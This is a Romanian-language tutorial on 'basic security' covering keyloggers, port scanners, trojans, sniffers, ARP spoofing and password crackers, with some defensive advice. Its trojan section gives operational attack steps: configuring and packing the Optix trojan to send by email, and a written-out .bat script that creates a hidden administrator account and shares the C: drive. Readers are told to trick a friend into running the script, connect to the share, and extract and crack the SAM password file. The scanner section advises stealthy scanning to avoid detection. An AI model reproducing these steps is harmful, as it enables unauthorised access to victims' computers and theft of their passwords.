BasicSecurity - notiuni securitate de baza!

In acest tutorial veti invata mai multe despre uneltele folosite de hackeri pentru atingerea scopului lor. Keyloggere, Scannere, Virusii de tip cal troian, Sniffere, Password crackers.

1. Ce este un keylogger ? Este o unealta folositoare pe care o poti instala pe un calculator, in scopul de a urmari activitatea unei persoane. Unele keyloggere au capacitatea de a functiona in mod “stealth” , adica prezenta programului nu e semnalata de nici un icon in Task Bar si nici chiar in Task Manager. Pe langa faptul ca inregistreaza tot ce tastezi, inregistreaza de asemenea ce programe ai folosit, unele fac si snapshoturi si au posibilitatea sa trimita la o anumita adresa de email tot ce inregistreaza. Unele keyloggere sunt detectate de antivirus si sterse. Am mai vorbit despre keyloggere in tutorialul despre cum sa afli o parola de email. Cum te aperi de un keylogger? In primul rand aveti grija la cine umbla la calculatorul vostru, puneti o parola la BIOS, o parola la butarea sistemului de operare. Nu deschideti fisierele cu extensii ciudate cum ar .exe, .cmd,.com etc din emailuri de la persoane pe care nu le cunoasteti. Programe gen Spy Cop, Ad-Aware SE sau Spybot-search and destroy detecteaza si anihileaza programele malitioase care ne observa activitatea si transmit datelele pe Internet.

2. Ce este un scanner? Este un program care in mod automat gaseste ce porturi deschise sunt pe un calculator si ce vulnerabilitati are. Scanner-ul ofera informatii pretioase despre gradul de securitate a computerelor dintr-o retea. Multe scannere sunt detectate de firewall-uri sau IDS (Intrusion Detection System), si tinand cont de faptul ca a scana este illegal in Romania, este de preferat sa folosesti scannere mai stealth cum ar fi cele de Linux. Nmap este un scanner grozav, unul dintre cele mai bune dupa parerea mea, fiind folosit atat pe platforme Linux dar si Windows. Are multe caracteristici interesante cum ar fi : posibilitatea de a scana chiar in conditiile in care firewallul blocheaza ping-ul, realizeaza un scan SYN/stealth si FIN/stealth, idle scan folosind o gazda internediara numita zombie :) Mai multe aflati din manualul de utilizare. Atunci cand scanezi consumi o latime de banda mai mare decat consumi de obicei, si in plus daca scanezi cu scannere mai zgomotoase cum ar fi Languardnss6 activitatea ta va aparea in multe logs. E de preferat sa utilizati acest scanner pe IP-ul vostru ca sa vedeti ce porturi deshise aveti si ce vulnerabilitati, si sa le rezolvati bineinteles. Cum te aperi de scanat ? Cu firewall-uri si IDS. De asemenea, inchideti porturile nefolositoare care sunt deschise. Partea buna a scannerelor este ca poti vedea din timp ce vulnerabilitati are computerul tau, inainte ca cineva rau intentionat sa profite de ele.

3. Ce este un troian? Probabil ati facut deja cunostinta cu virus troian. In mod sigur nu o fost o intalnire placuta.Troienii sunt o arma de temut din arsenalul unui hacker, unii avand posibilitatea de a face o multitudine de chestii interesante. Un troian cum ar fi de exemplu Optix v.1.33, atunci cand este instalat dezactiveaza orice firewall si orice antivirus se gaseste pe calculatorul infectat. Optix este un troian de tip client-server, clientul fiind tu iar serverul calculatorul infectat. Ca sa-l folositi, inchideti antivirusul, dati la builder si o sa aveti mai multe optiuni: sa-i puneti o parola (ceea ce e recomandat, sa nu se poata folosi altii de troian), sa-i schimbati portul prin care o sa va conectati (este recomandat si acest lucru) si sa-l arhivati cu optiunea UPX (vezi articolul "Cum sa faci un troian nedetectabil"). Dupa ce ati realizat toti pasii de mai sus ati obtinut un client de troian arhivat pe care-l puteti trimite prin email sau daca aveti acces fizic la un calculator sa-l instalati manual. Dupa ce s-a instalat, urmatorul pas este sa deschideti modulul de client. Are o interfata prietenoasa si usor de folosit, la ip puneti ip-ul computerului pe care ati instalat troianul, la port puneti portul pe care l-ati stabilit iar la parola, evident, puneti parola cu care vreti sa va conectati. Odata conectat poti sa faci o serie de lucruri interesante : sa urmaresti absolut tot ceea ce face persoana de la calculator in timp real, sa inregistrezi ceea ce tasteaza, poti sa-i deschizi CD ROM-ul, poti sa-i trimiti mesaje sau sa-i inchizi calculatorul.

Mai jos aveti un exemplu despre cum sa faceti un troian micut si nedectabil de antivirusi. Acest troian este un fisier cu extensia .bat care foloseste 3 comenzi din cmd : net user, net share si net send. Deschideti Notepad-ul si editati urmatoarele linii de comenzi:

net user admin /add
net localgroup administrators admin /add
net share system=C: /unlimited
net send ipultau Sunt noul tau server

Salvati fisierul cu extensia .bat Convingeti un prieten din retea sa downloadeze si sa dea click pe acest fisier. Ce anume face acest script ? Creaza un nou user numit admin si ii comfera acestuia drepturi de administrator. De asemenea, discul C: este pus la share. Deschideti cmd-ul si dati urmatoarele comenzi pentru a avea acces la unitatea C:

net use ipulvictimei admin
explorer ipulvictimeisystem

Odata intrat in C: extrageti parola SAM din C:WINDOWSsystem32configSAM si spargeti-o cu un program de brute force gen L0phtCrack 4, John sau Cain. Nu va limitati numai la atat. Puteti face o multime de lucruri interesante, totul depinzand de imaginatie. Cum te aperi impotriva unui troian, si a virusilor in general ? Programe antivirus cu update-uri la zi si firewall. Personal, am testat in timp mai multe antivirusuri, si in prezent folosesc NOD32. Si Kaspersky mi-o facut o impresie buna. Ca firewall, Blackice si Zone Alarm. Dar antivirusii pot fi pacaliti, un troian cu un signature modificat poate trece neobservat, sau daca arhivati si scanati un troian, antivirusul va zice ca totul e ok. Se pot ocoli si firewall-urile de asemenea ;) Instalati cele mai noi patch-uri pentru sistemul de operare, dar nu neglijati si patch-urile pt programele pe care le folositi.

4. Ce este un sniffer? Un sniffer, in promiscuos mode poate captura toate informatiile care circula intr-o retea. Poti vedea pe ce situri navigheaza ceilalti din retea, ce vorbesc ei pe messenger sau sa le inregistrezi parolele care circula in format plain text. Protocolurile FTP, HTTP, SMTP, POP3 nu sunt criptate si poti citi parolele in plain text. Un sniffer instalat pe un server prezinta o mare amenintare la adresa securitatii unei retele. Ca o masura impotriva capturarii parolelor in plain text, trebuie folosit protocoluri securizate cum ar fi https si ssh in loc de http si telnet. Un sniffer bun pentru Windows este Cain&Abel . Are options de sniffer, de arpspoofing si de a sparge parole encriptate LM si NTLM, fisiere PWL, parole de routere Cisco, de VNC si multe alte caracteristici interesante pe care o sa le descoperiti. Cum te poti apara de un sniffer ? Un switch analizeaza datele care sunt transmise prin el si are grija ca ele sa ajunga la destinatia potrivita. Retelele cu un asemenea device de networking sunt mai securizate si de asemenea mai rapide.

ARP Spoofing. ARP vine de la Address Resolution Protocol si transleaza IP-urile catre adrese MAC. Folosind un program de spoof putem minti catre celelalte calculatoare din retea si sa pretindem ca noi avem IP-ul pe care il cauta. Trebuie sa aveti grija cum folositi astfel de programe pt ca o folosire eronata ar putea destabiliza toata reteaua blocand toate comunicatiile. Cititi cu grija manualul de folosinta al programelor iar daca vreti sa aflati mai multe despre ARP Spoof cautati pe google.

Contramasuri pentru ARP Spoofing : atribuirea fiecarui calculator din retea a unei valori ARP statice, folosirea unui program gen ARPWatch pt a observa schimbarile de adrese MAC din retea, si folosirea unor protocoluri securizate : SSH, SSL, VPN etc.

5. Ce este un program de brute force? Este un program destinat spargerii de parole prin incercarea de a le ghici cu un dictionar de cuvinte sau prin brute force, adica generand cuvinte alfanumerice plus caractere speciale de genul ~ !@#$%^&*()_+|. etc In cazul in care parola nu este un cuvant obisnuit din dictionar si are o lungime de peste 8 caractere ar dura o vesnicie pentru a o afla. Un program bun de brute force pentru Linux si Windows ar fi John the riper care este rapid in comparatie cu programe de acest gen. Exista programe de brute force pentru protocolurile NetBIOS, HTTP, FTP, Telnet, POP3. Cum ii facem viata grea celui care incearca sa ne sparga parolele folosind un program de brute force? Folositi parole de minim 8 caractere, cu caractere alfanumerice si semne gen ~ !@#$%^&*()_ , si nu folositi cuvinte obisnuite din dictionar. In nici un caz nu folositi numele sau datele personale drept parole. Pentru a sparge o parola mai lunga de 8 caractere si care nu se gaseste intr-un dictionar cere ff mult timp.